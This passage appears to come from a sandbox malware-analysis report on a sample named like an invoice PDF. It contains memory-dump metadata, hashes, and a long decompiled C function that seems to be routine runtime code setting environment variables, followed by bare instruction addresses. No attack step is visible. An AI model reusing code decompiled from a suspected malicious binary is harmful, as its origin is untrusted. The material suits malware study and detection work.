                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56236ffcfb9b47a1f1cb54b1aabb10f73a4baa927081c31a6a0e74f79bbb6241
                            • Instruction ID: f45e17dc1d8471f09d9a8fca85a8be5a256ebf4ef9a8d3a7f44f5dcfda626c45
                            • Opcode Fuzzy Hash: 56236ffcfb9b47a1f1cb54b1aabb10f73a4baa927081c31a6a0e74f79bbb6241
                            • Instruction Fuzzy Hash: E261AA7164070D96EE3C593C88947BEF7BCEF5570CF44481AEA43DBA8CDA11D9428356
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a10261fc734715ea16eca571b66a854d72724520d3b3f847661583a0c35ea71
                            • Instruction ID: e083f24b7d42fea71da9c658e80d72b2a9cf19c4b21fe623d34729409294914c
                            • Opcode Fuzzy Hash: 0a10261fc734715ea16eca571b66a854d72724520d3b3f847661583a0c35ea71
                            • Instruction Fuzzy Hash: 3C7196756201714FD728CE6DE8D043B77A5E38A301F86462DE686CB38DC638E526D7B4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E013261F0(void* __edx, signed int _a4, signed int _a8) {
                            				signed int _v0;
                            				signed char _v5;
                            				intOrPtr _v8;
                            				signed char _v9;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v44;
                            				signed int _v92;
                            				signed int _v128;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t116;
                            				signed int _t119;
                            				signed int _t120;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t126;
                            				signed int _t127;
                            				signed int _t131;
                            				signed int _t133;
                            				signed int _t136;
                            				signed int _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				void* _t143;
                            				signed int _t148;
                            				signed int* _t150;
                            				signed int* _t156;
                            				signed int _t163;
                            				signed int _t165;
                            				signed int _t167;
                            				intOrPtr _t168;
                            				signed int _t173;
                            				signed int _t175;
                            				signed int _t176;
                            				signed int _t180;
                            				signed int _t185;
                            				intOrPtr* _t186;
                            				signed int _t191;
                            				signed int _t196;
                            				signed int _t197;
                            				signed int _t204;
                            				intOrPtr* _t205;
                            				signed int _t214;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t218;
                            				signed int _t220;
                            				signed int _t221;
                            				signed int _t223;
                            				intOrPtr _t225;
                            				void* _t231;
                            				signed int _t233;
                            				void* _t236;
                            				signed int _t237;
                            				signed int _t238;
                            				void* _t241;
                            				signed int _t244;
                            				signed int _t246;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t254;
                            				void* _t260;
                            				void* _t262;
                            				signed int _t263;
                            				intOrPtr* _t267;
                            				intOrPtr* _t271;
                            				signed int _t274;
                            				signed int _t276;
                            				signed int _t280;
                            				signed int _t282;
                            				void* _t283;
                            				void* _t284;
                            				void* _t285;
                            				void* _t286;
                            				signed int _t287;
                            				signed int _t289;
                            				signed int _t291;
                            				signed int _t292;
                            				signed int* _t293;
                            				signed int _t299;
                            				signed int _t300;
                            				CHAR* _t301;
                            				signed int _t303;
                            				signed int _t304;
                            				WCHAR* _t305;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int* _t308;
                            				signed int _t309;
                            				signed int _t311;
                            				void* _t317;
                            				void* _t318;
                            				void* _t319;
                            				void* _t321;
                            				void* _t322;
                            				void* _t323;
                            				void* _t324;
                            
                            				_t283 = __edx;
                            				_t217 = _a4;
                            				if(_t217 != 0) {
                            					_t287 = _t217;
                            					_t116 = E01318680(_t217, 0x3d);
                            					_v16 = _t116;
                            					_t231 = _t286;
                            					__eflags = _t116;
                            					if(_t116 == 0) {
                            						L10:
                            						 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            						goto L11;
                            					} else {
                            						__eflags = _t116 - _t217;
                            						if(_t116 == _t217) {
                            							goto L10;
                            						} else {
                            							__eflags =  *((char*)(_t116 + 1));
                            							_t299 =  *0x13460bc; // 0x0
                            							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                            							_v5 = _t120;
                            							__eflags = _t299 -  *0x13460c8; // 0x0
                            							if(__eflags == 0) {
                            								L87();
                            								_t299 = _t120;
                            								_t120 = _v5;
                            								_t231 = _t299;
                            								 *0x13460bc = _t299;
                            							}
                            							_t218 = 0;
                            							__eflags = _t299;
                            							if(_t299 != 0) {
                            								L21:
                            								_t233 = _t287;
                            								_t122 = _v16 - _t233;
                            								_push(_t122);
                            								_push(_t233);
                            								L121();
                            								_v12 = _t122;
                            								__eflags = _t122;
                            								if(_t122 < 0) {
                            									L29:
                            									__eflags = _v5 - _t218;
                            									if(_v5 != _t218) {
                            										goto L12;
                            									} else {
                            										_t123 =  ~_t122;
                            										_v12 = _t123;
                            										_t27 = _t123 + 2; // 0x2
                            										_t236 = _t27;
                            										__eflags = _t236 - _t123;
                            										if(_t236 < _t123) {
                            											goto L11;
                            										} else {
                            											__eflags = _t236 - 0x3fffffff;
                            											if(_t236 >= 0x3fffffff) {
                            												goto L11;
                            											} else {
                            												_push(4);
                            												_push(_t236);
                            												_t300 = E0132850F(_t299);
                            												E013209EB(_t218);
                            												_t321 = _t321 + 0x10;
                            												__eflags = _t300;
                            												if(_t300 == 0) {
                            													goto L11;
                            												} else {
                            													_t237 = _v12;
                            													_t287 = _t218;
                            													_t126 = _a4;
                            													 *(_t300 + _t237 * 4) = _t126;
                            													 *(_t300 + 4 + _t237 * 4) = _t218;
                            													goto L34;
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									__eflags =  *_t299 - _t218;
                            									if( *_t299 == _t218) {
                            										goto L29;
                            									} else {
                            										E013209EB( *((intOrPtr*)(_t299 + _t122 * 4)));
                            										_t282 = _v12;
                            										__eflags = _v5 - _t218;
                            										if(_v5 != _t218) {
                            											while(1) {
                            												__eflags =  *(_t299 + _t282 * 4) - _t218;
                            												if( *(_t299 + _t282 * 4) == _t218) {
                            													break;
                            												}
                            												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
                            												_t282 = _t282 + 1;
                            												__eflags = _t282;
                            											}
                            											_push(4);
                            											_push(_t282);
                            											_t300 = E0132850F(_t299);
                            											E013209EB(_t218);
                            											_t321 = _t321 + 0x10;
                            											_t126 = _t287;
                            											__eflags = _t300;
                            											if(_t300 != 0) {
                            												L34:
                            												 *0x13460bc = _t300;
                            											}
                            										} else {
                            											_t126 = _a4;
                            											_t287 = _t218;
                            											 *(_t299 + _t282 * 4) = _t126;
                            										}
                            										__eflags = _a8 - _t218;
                            										if(_a8 == _t218) {
                            											goto L12;
                            										} else {
                            											_t238 = _t126;
                            											_t284 = _t238 + 1;
                            											do {
                            												_t127 =  *_t238;
                            												_t238 = _t238 + 1;
                            												__eflags = _t127;
                            											} while (_t127 != 0);
                            											_v12 = _t238 - _t284 + 2;
                            											_t301 = E01320B10(_t238 - _t284, _t238 - _t284 + 2, 1);
                            											_pop(_t241);
                            											__eflags = _t301;
                            											if(_t301 == 0) {
                            												L42:
                            												E013209EB(_t301);
                            												goto L12;
                            											} else {
                            												_t131 = E01320A73(_t301, _v12, _a4);
                            												_t322 = _t321 + 0xc;
                            												__eflags = _t131;
                            												if(_t131 != 0) {
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													E01321798();
                            													asm("int3");
                            													_t317 = _t322;
                            													_t323 = _t322 - 0xc;
                            													_push(_t218);
                            													_t220 = _v44;
                            													__eflags = _t220;
                            													if(_t220 != 0) {
                            														_push(_t301);
                            														_push(_t287);
                            														_push(0x3d);
                            														_t289 = _t220;
                            														_t133 = E013188E7(_t241);
                            														_v20 = _t133;
                            														_t244 = _t220;
                            														__eflags = _t133;
                            														if(_t133 == 0) {
                            															L54:
                            															 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            															goto L55;
                            														} else {
                            															__eflags = _t133 - _t220;
                            															if(_t133 == _t220) {
                            																goto L54;
                            															} else {
                            																_t303 =  *0x13460c0; // 0x1084680
                            																_t221 = 0;
                            																__eflags =  *(_t133 + 2);
                            																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                            																_v9 = _t246;
                            																__eflags = _t303 -  *0x13460c4; // 0x10542f0
                            																if(__eflags == 0) {
                            																	_push(_t303);
                            																	L104();
                            																	_t246 = _v9;
                            																	_t303 = _t133;
                            																	 *0x13460c0 = _t303;
                            																}
                            																__eflags = _t303;
                            																if(_t303 != 0) {
                            																	L64:
                            																	_v20 = _v20 - _t289 >> 1;
                            																	_t138 = E0132682B(_t289, _v20 - _t289 >> 1);
                            																	_v16 = _t138;
                            																	__eflags = _t138;
                            																	if(_t138 < 0) {
                            																		L72:
                            																		__eflags = _v9 - _t221;
                            																		if(_v9 != _t221) {
                            																			goto L56;
                            																		} else {
                            																			_t139 =  ~_t138;
                            																			_v16 = _t139;
                            																			_t72 = _t139 + 2; // 0x2
                            																			_t252 = _t72;
                            																			__eflags = _t252 - _t139;
                            																			if(_t252 < _t139) {
                            																				goto L55;
                            																			} else {
                            																				__eflags = _t252 - 0x3fffffff;
                            																				if(_t252 >= 0x3fffffff) {
                            																					goto L55;
                            																				} else {
                            																					_push(4);
                            																					_push(_t252);
                            																					_t304 = E0132850F(_t303);
                            																					E013209EB(_t221);
                            																					_t323 = _t323 + 0x10;
                            																					__eflags = _t304;
                            																					if(_t304 == 0) {
                            																						goto L55;
                            																					} else {
                            																						_t253 = _v16;
                            																						_t289 = _t221;
                            																						_t142 = _v0;
                            																						 *(_t304 + _t253 * 4) = _t142;
                            																						 *(_t304 + 4 + _t253 * 4) = _t221;
                            																						goto L77;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags =  *_t303 - _t221;
                            																		if( *_t303 == _t221) {
                            																			goto L72;
                            																		} else {
                            																			E013209EB( *((intOrPtr*)(_t303 + _t138 * 4)));
                            																			_t276 = _v16;
                            																			__eflags = _v9 - _t221;
                            																			if(_v9 != _t221) {
                            																				while(1) {
                            																					__eflags =  *(_t303 + _t276 * 4) - _t221;
                            																					if( *(_t303 + _t276 * 4) == _t221) {
                            																						break;
                            																					}
                            																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
                            																					_t276 = _t276 + 1;
                            																					__eflags = _t276;
                            																				}
                            																				_push(4);
                            																				_push(_t276);
                            																				_t304 = E0132850F(_t303);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0x10;
                            																				_t142 = _t289;
                            																				__eflags = _t304;
                            																				if(_t304 != 0) {
                            																					L77:
                            																					 *0x13460c0 = _t304;
                            																				}
                            																			} else {
                            																				_t142 = _v0;
                            																				_t289 = _t221;
                            																				 *(_t303 + _t276 * 4) = _t142;
                            																			}
                            																			__eflags = _a4 - _t221;
                            																			if(_a4 == _t221) {
                            																				goto L56;
                            																			} else {
                            																				_t254 = _t142;
                            																				_t81 = _t254 + 2; // 0x2
                            																				_t285 = _t81;
                            																				do {
                            																					_t143 =  *_t254;
                            																					_t254 = _t254 + 2;
                            																					__eflags = _t143 - _t221;
                            																				} while (_t143 != _t221);
                            																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
                            																				_v16 = _t82;
                            																				_t305 = E01320B10(_t254 - _t285 >> 1, _t82, 2);
                            																				_pop(_t258);
                            																				__eflags = _t305;
                            																				if(_t305 == 0) {
                            																					L85:
                            																					E013209EB(_t305);
                            																					goto L56;
                            																				} else {
                            																					_t148 = E0132618C(_t305, _v16, _v0);
                            																					_t324 = _t323 + 0xc;
                            																					__eflags = _t148;
                            																					if(_t148 != 0) {
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						E01321798();
                            																						asm("int3");
                            																						_push(_t317);
                            																						_t318 = _t324;
                            																						_push(_t289);
                            																						_t291 = _v92;
                            																						__eflags = _t291;
                            																						if(_t291 != 0) {
                            																							_t260 = 0;
                            																							_t150 = _t291;
                            																							__eflags =  *_t291;
                            																							if( *_t291 != 0) {
                            																								do {
                            																									_t150 =  &(_t150[1]);
                            																									_t260 = _t260 + 1;
                            																									__eflags =  *_t150;
                            																								} while ( *_t150 != 0);
                            																							}
                            																							_t93 = _t260 + 1; // 0x2
                            																							_t306 = E01320B10(_t260, _t93, 4);
                            																							_t262 = _t305;
                            																							__eflags = _t306;
                            																							if(_t306 == 0) {
                            																								L102:
                            																								E01320ACD(_t221, _t285, _t291, _t306);
                            																								goto L103;
                            																							} else {
                            																								__eflags =  *_t291;
                            																								if( *_t291 == 0) {
                            																									L100:
                            																									E013209EB(0);
                            																									_t175 = _t306;
                            																									goto L101;
                            																								} else {
                            																									_push(_t221);
                            																									_t221 = _t306 - _t291;
                            																									__eflags = _t221;
                            																									do {
                            																										_t271 =  *_t291;
                            																										_t94 = _t271 + 1; // 0x5
                            																										_t285 = _t94;
                            																										do {
                            																											_t176 =  *_t271;
                            																											_t271 = _t271 + 1;
                            																											__eflags = _t176;
                            																										} while (_t176 != 0);
                            																										_t262 = _t271 - _t285;
                            																										_t95 = _t262 + 1; // 0x6
                            																										_v16 = _t95;
                            																										 *(_t221 + _t291) = E01320B10(_t262, _t95, 1);
                            																										E013209EB(0);
                            																										_t324 = _t324 + 0xc;
                            																										__eflags =  *(_t221 + _t291);
                            																										if( *(_t221 + _t291) == 0) {
                            																											goto L102;
                            																										} else {
                            																											_t180 = E01320A73( *(_t221 + _t291), _v16,  *_t291);
                            																											_t324 = _t324 + 0xc;
                            																											__eflags = _t180;
                            																											if(_t180 != 0) {
                            																												L103:
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												E01321798();
                            																												asm("int3");
                            																												_push(_t318);
                            																												_t319 = _t324;
                            																												_push(_t262);
                            																												_push(_t262);
                            																												_push(_t291);
                            																												_t292 = _v128;
                            																												__eflags = _t292;
                            																												if(_t292 != 0) {
                            																													_push(_t221);
                            																													_t223 = 0;
                            																													_t156 = _t292;
                            																													_t263 = 0;
                            																													_v20 = 0;
                            																													_push(_t306);
                            																													__eflags =  *_t292;
                            																													if( *_t292 != 0) {
                            																														do {
                            																															_t156 =  &(_t156[1]);
                            																															_t263 = _t263 + 1;
                            																															__eflags =  *_t156;
                            																														} while ( *_t156 != 0);
                            																													}
                            																													_t104 = _t263 + 1; // 0x2
                            																													_t307 = E01320B10(_t263, _t104, 4);
                            																													__eflags = _t307;
                            																													if(_t307 == 0) {
                            																														L119:
                            																														E01320ACD(_t223, _t285, _t292, _t307);
                            																														goto L120;
                            																													} else {
                            																														__eflags =  *_t292 - _t223;
                            																														if( *_t292 == _t223) {
                            																															L117:
                            																															E013209EB(_t223);
                            																															_t167 = _t307;
                            																															goto L118;
                            																														} else {
                            																															_t223 = _t307 - _t292;
                            																															__eflags = _t223;
                            																															do {
                            																																_t267 =  *_t292;
                            																																_t105 = _t267 + 2; // 0x6
                            																																_t285 = _t105;
                            																																do {
                            																																	_t168 =  *_t267;
                            																																	_t267 = _t267 + 2;
                            																																	__eflags = _t168 - _v20;
                            																																} while (_t168 != _v20);
                            																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
                            																																_v24 = _t107;
                            																																 *(_t223 + _t292) = E01320B10(_t267 - _t285 >> 1, _t107, 2);
                            																																E013209EB(0);
                            																																_t324 = _t324 + 0xc;
                            																																__eflags =  *(_t223 + _t292);
                            																																if( *(_t223 + _t292) == 0) {
                            																																	goto L119;
                            																																} else {
                            																																	_t173 = E0132618C( *(_t223 + _t292), _v24,  *_t292);
                            																																	_t324 = _t324 + 0xc;
                            																																	__eflags = _t173;
                            																																	if(_t173 != 0) {
                            																																		L120:
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		E01321798();
                            																																		asm("int3");
                            																																		_push(_t319);
                            																																		_push(_t223);
                            																																		_push(_t307);
                            																																		_push(_t292);
                            																																		_t293 =  *0x13460bc; // 0x0
                            																																		_t308 = _t293;
                            																																		__eflags =  *_t293;
                            																																		if( *_t293 == 0) {
                            																																			L127:
                            																																			_t309 = _t308 - _t293;
                            																																			__eflags = _t309;
                            																																			_t311 =  ~(_t309 >> 2);
                            																																		} else {
                            																																			_t225 = _v8;
                            																																			do {
                            																																				_t163 = E0132C265(_v12,  *_t308, _t225);
                            																																				_t324 = _t324 + 0xc;
                            																																				__eflags = _t163;
                            																																				if(_t163 != 0) {
                            																																					goto L126;
                            																																				} else {
                            																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
                            																																					__eflags = _t165 - 0x3d;
                            																																					if(_t165 == 0x3d) {
                            																																						L129:
                            																																						_t311 = _t308 - _t293 >> 2;
                            																																					} else {
                            																																						__eflags = _t165;
                            																																						if(_t165 == 0) {
                            																																							goto L129;
                            																																						} else {
                            																																							goto L126;
                            																																						}
                            																																					}
                            																																				}
                            																																				goto L128;
                            																																				L126:
                            																																				_t308 =  &(_t308[1]);
                            																																				__eflags =  *_t308;
                            																																			} while ( *_t308 != 0);
                            																																			goto L127;
                            																																		}
                            																																		L128:
                            																																		return _t311;
                            																																	} else {
                            																																		goto L115;
                            																																	}
                            																																}
                            																																goto L130;
                            																																L115:
                            																																_t292 = _t292 + 4;
                            																																__eflags =  *_t292 - _t173;
                            																															} while ( *_t292 != _t173);
                            																															_t223 = 0;
                            																															__eflags = 0;
                            																															goto L117;
                            																														}
                            																													}
                            																												} else {
                            																													_t167 = 0;
                            																													L118:
                            																													return _t167;
                            																												}
                            																											} else {
                            																												goto L98;
                            																											}
                            																										}
                            																										goto L130;
                            																										L98:
                            																										_t291 = _t291 + 4;
                            																										__eflags =  *_t291 - _t180;
                            																									} while ( *_t291 != _t180);
                            																									goto L100;
                            																								}
                            																							}
                            																						} else {
                            																							_t175 = 0;
                            																							L101:
                            																							return _t175;
                            																						}
                            																					} else {
                            																						_t274 =  &(_t305[_v20 + 1]);
                            																						 *(_t274 - 2) = _t148;
                            																						asm("sbb eax, eax");
                            																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
                            																						__eflags = _t185;
                            																						if(_t185 == 0) {
                            																							_t186 = E0131C9CE();
                            																							_t221 = _t221 | 0xffffffff;
                            																							__eflags = _t221;
                            																							 *_t186 = 0x2a;
                            																						}
                            																						goto L85;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	}
                            																} else {
                            																	_t191 =  *0x13460bc; // 0x0
                            																	__eflags = _a4 - _t221;
                            																	if(_a4 == _t221) {
                            																		L58:
                            																		__eflags = _t246;
                            																		if(_t246 != 0) {
                            																			goto L56;
                            																		} else {
                            																			__eflags = _t191;
                            																			if(_t191 != 0) {
                            																				L62:
                            																				 *0x13460c0 = E01320B10(_t246, 1, 4);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				goto L63;
                            																			} else {
                            																				 *0x13460bc = E01320B10(_t246, 1, 4);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				__eflags =  *0x13460bc - _t221; // 0x0
                            																				if(__eflags == 0) {
                            																					goto L55;
                            																				} else {
                            																					_t303 =  *0x13460c0; // 0x1084680
                            																					__eflags = _t303;
                            																					if(_t303 != 0) {
                            																						goto L64;
                            																					} else {
                            																						goto L62;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags = _t191;
                            																		if(_t191 == 0) {
                            																			goto L58;
                            																		} else {
                            																			_t196 = L0131FF04(_t221);
                            																			__eflags = _t196;
                            																			if(_t196 != 0) {
                            																				L63:
                            																				_t303 =  *0x13460c0; // 0x1084680
                            																				__eflags = _t303;
                            																				if(_t303 == 0) {
                            																					L55:
                            																					_t221 = _t220 | 0xffffffff;
                            																					__eflags = _t221;
                            																					L56:
                            																					E013209EB(_t289);
                            																					_t136 = _t221;
                            																					goto L57;
                            																				} else {
                            																					goto L64;
                            																				}
                            																			} else {
                            																				goto L54;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t197 = E0131C9CE();
                            														 *_t197 = 0x16;
                            														_t136 = _t197 | 0xffffffff;
                            														L57:
                            														return _t136;
                            													}
                            												} else {
                            													_t280 = _v16 + 1 + _t301 - _a4;
                            													asm("sbb eax, eax");
                            													 *(_t280 - 1) = _t218;
                            													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
                            													__eflags = _t204;
                            													if(_t204 == 0) {
                            														_t205 = E0131C9CE();
                            														_t218 = _t218 | 0xffffffff;
                            														__eflags = _t218;
                            														 *_t205 = 0x2a;
                            													}
                            													goto L42;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _a8;
                            								if(_a8 == 0) {
                            									L14:
                            									__eflags = _t120;
                            									if(_t120 == 0) {
                            										 *0x13460bc = E01320B10(_t231, 1, 4);
                            										E013209EB(_t218);
                            										_t299 =  *0x13460bc; // 0x0
                            										_t321 = _t321 + 0xc;
                            										__eflags = _t299;
                            										if(_t299 == 0) {
                            											goto L11;
                            										} else {
                            											__eflags =  *0x13460c0 - _t218; // 0x1084680
                            											if(__eflags != 0) {
                            												goto L20;
                            											} else {
                            												 *0x13460c0 = E01320B10(_t231, 1, 4);
                            												E013209EB(_t218);
                            												_t321 = _t321 + 0xc;
                            												__eflags =  *0x13460c0 - _t218; // 0x1084680
                            												if(__eflags == 0) {
                            													goto L11;
                            												} else {
                            													goto L19;
                            												}
                            											}
                            										}
                            									} else {
                            										_t218 = 0;
                            										goto L12;
                            									}
                            								} else {
                            									__eflags =  *0x13460c0 - _t218; // 0x1084680
                            									if(__eflags == 0) {
                            										goto L14;
                            									} else {
                            										_t214 = L0131FEFF(0, _t283);
                            										__eflags = _t214;
                            										if(_t214 != 0) {
                            											L19:
                            											_t299 =  *0x13460bc; // 0x0
                            											L20:
                            											__eflags = _t299;
                            											if(_t299 == 0) {
                            												L11:
                            												_t218 = _t217 | 0xffffffff;
                            												__eflags = _t218;
                            												L12:
                            												E013209EB(_t287);
                            												_t119 = _t218;
                            												goto L13;
                            											} else {
                            												goto L21;
                            											}
                            										} else {
                            											goto L10;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					_t215 = E0131C9CE();
                            					 *_t215 = 0x16;
                            					_t119 = _t215 | 0xffffffff;
                            					L13:
                            					return _t119;
                            				}
                            				L130:
                            			}
                            0x013265e2
                            0x013265e4
                            0x013265e4
                            0x013265e7
                            0x013265e7
                            0x013265ea
                            0x013265ed
                            0x013265ed
                            0x013265f8
                            0x013265fc
                            0x01326604
                            0x01326607
                            0x01326608
                            0x0132660a
                            0x01326651
                            0x01326652
                            0x00000000
                            0x0132660c
                            0x01326614
                            0x01326619
                            0x0132661c
                            0x0132661e
                            0x0132665d
                            0x0132665e
                            0x0132665f
                            0x01326660
                            0x01326661
                            0x01326662
                            0x01326667
                            0x0132666a
                            0x0132666b
                            0x0132666e
                            0x0132666f
                            0x01326672
                            0x01326674
                            0x0132667d
                            0x0132667f
                            0x01326681
                            0x01326683
                            0x01326685
                            0x01326685
                            0x01326688
                            0x01326689
                            0x01326689
                            0x01326685
                            0x0132668f
                            0x0132669a
                            0x0132669d
                            0x0132669e
                            0x013266a0
                            0x01326707
                            0x01326707
                            0x00000000
                            0x013266a2
                            0x013266a2
                            0x013266a5
                            0x013266f7
                            0x013266f9
                            0x013266ff
                            0x00000000
                            0x013266a7
                            0x013266a7
                            0x013266aa
                            0x013266aa
                            0x013266ac
                            0x013266ac
                            0x013266ae
                            0x013266ae
                            0x013266b1
                            0x013266b1
                            0x013266b3
                            0x013266b4
                            0x013266b4
                            0x013266b8
                            0x013266bc
                            0x013266c0
                            0x013266ca
                            0x013266cd
                            0x013266d2
                            0x013266d5
                            0x013266d9
                            0x00000000
                            0x013266db
                            0x013266e3
                            0x013266e8
                            0x013266eb
                            0x013266ed
                            0x0132670c
                            0x0132670e
                            0x0132670f
                            0x01326710
                            0x01326711
                            0x01326712
                            0x01326713
                            0x01326718
                            0x0132671b
                            0x0132671c
                            0x0132671e
                            0x0132671f
                            0x01326720
                            0x01326721
                            0x01326724
                            0x01326726
                            0x0132672f
                            0x01326730
                            0x01326732
                            0x01326734
                            0x01326736
                            0x01326739
                            0x0132673a
                            0x0132673c
                            0x0132673e
                            0x0132673e
                            0x01326741
                            0x01326742
                            0x01326742
                            0x0132673e
                            0x01326746
                            0x01326751
                            0x01326755
                            0x01326757
                            0x013267c5
                            0x013267c5
                            0x00000000
                            0x01326759
                            0x01326759
                            0x0132675b
                            0x013267b5
                            0x013267b6
                            0x013267bc
                            0x00000000
                            0x0132675d
                            0x0132675f
                            0x0132675f
                            0x01326761
                            0x01326761
                            0x01326763
                            0x01326763
                            0x01326766
                            0x01326766
                            0x01326769
                            0x0132676c
                            0x0132676c
                            0x01326778
                            0x0132677c
                            0x01326784
                            0x0132678a
                            0x0132678f
                            0x01326792
                            0x01326796
                            0x00000000
                            0x01326798
                            0x013267a0
                            0x013267a5
                            0x013267a8
                            0x013267aa
                            0x013267ca
                            0x013267cc
                            0x013267cd
                            0x013267ce
                            0x013267cf
                            0x013267d0
                            0x013267d1
                            0x013267d6
                            0x013267d9
                            0x013267dc
                            0x013267dd
                            0x013267de
                            0x013267df
                            0x013267e5
                            0x013267e7
                            0x013267ea
                            0x01326816
                            0x01326816
                            0x01326816
                            0x0132681b
                            0x013267ec
                            0x013267ec
                            0x013267ef
                            0x013267f5
                            0x013267fa
                            0x013267fd
                            0x013267ff
                            0x00000000
                            0x01326801
                            0x01326803
                            0x01326806
                            0x01326808
                            0x01326824
                            0x01326826
                            0x0132680a
                            0x0132680a
                            0x0132680c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132680c
                            0x01326808
                            0x00000000
                            0x0132680e
                            0x0132680e
                            0x01326811
                            0x01326811
                            0x00000000
                            0x013267ef
                            0x0132681d
                            0x01326823
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013267aa
                            0x00000000
                            0x013267ac
                            0x013267ac
                            0x013267af
                            0x013267af
                            0x013267b3
                            0x013267b3
                            0x00000000
                            0x013267b3
                            0x0132675b
                            0x01326728
                            0x01326728
                            0x013267c0
                            0x013267c4
                            0x013267c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013266ed
                            0x00000000
                            0x013266ef
                            0x013266ef
                            0x013266f2
                            0x013266f2
                            0x00000000
                            0x013266f6
                            0x013266a5
                            0x01326676
                            0x01326676
                            0x01326702
                            0x01326706
                            0x01326706
                            0x01326620
                            0x01326624
                            0x01326627
                            0x01326631
                            0x01326639
                            0x0132663f
                            0x01326641
                            0x01326643
                            0x01326648
                            0x01326648
                            0x0132664b
                            0x0132664b
                            0x00000000
                            0x01326641
                            0x0132661e
                            0x0132660a
                            0x013265dc
                            0x0132653d
                            0x01326498
                            0x01326498
                            0x0132649d
                            0x013264a0
                            0x013264cd
                            0x013264cd
                            0x013264cf
                            0x00000000
                            0x013264d1
                            0x013264d1
                            0x013264d3
                            0x013264fe
                            0x01326508
                            0x0132650d
                            0x01326512
                            0x00000000
                            0x013264d5
                            0x013264df
                            0x013264e4
                            0x013264e9
                            0x013264ec
                            0x013264f2
                            0x00000000
                            0x013264f4
                            0x013264f4
                            0x013264fa
                            0x013264fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264fc
                            0x013264f2
                            0x013264d3
                            0x013264a2
                            0x013264a2
                            0x013264a4
                            0x00000000
                            0x013264a6
                            0x013264a6
                            0x013264ab
                            0x013264ad
                            0x01326515
                            0x01326515
                            0x0132651b
                            0x0132651d
                            0x013264ba
                            0x013264ba
                            0x013264ba
                            0x013264bd
                            0x013264be
                            0x013264c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264ad
                            0x013264a4
                            0x013264a0
                            0x01326492
                            0x01326462
                            0x0132643b
                            0x0132643b
                            0x01326440
                            0x01326446
                            0x013264c8
                            0x013264cc
                            0x013264cc
                            0x013263e0
                            0x013263e9
                            0x013263f1
                            0x013263f5
                            0x013263fc
                            0x01326402
                            0x01326404
                            0x01326406
                            0x0132640b
                            0x0132640b
                            0x0132640e
                            0x0132640e
                            0x00000000
                            0x01326404
                            0x013263de
                            0x013263cb
                            0x013263a3
                            0x01326304
                            0x0132625d
                            0x0132625d
                            0x01326260
                            0x01326291
                            0x01326291
                            0x01326293
                            0x013262a3
                            0x013262a8
                            0x013262ad
                            0x013262b3
                            0x013262b6
                            0x013262b8
                            0x00000000
                            0x013262ba
                            0x013262ba
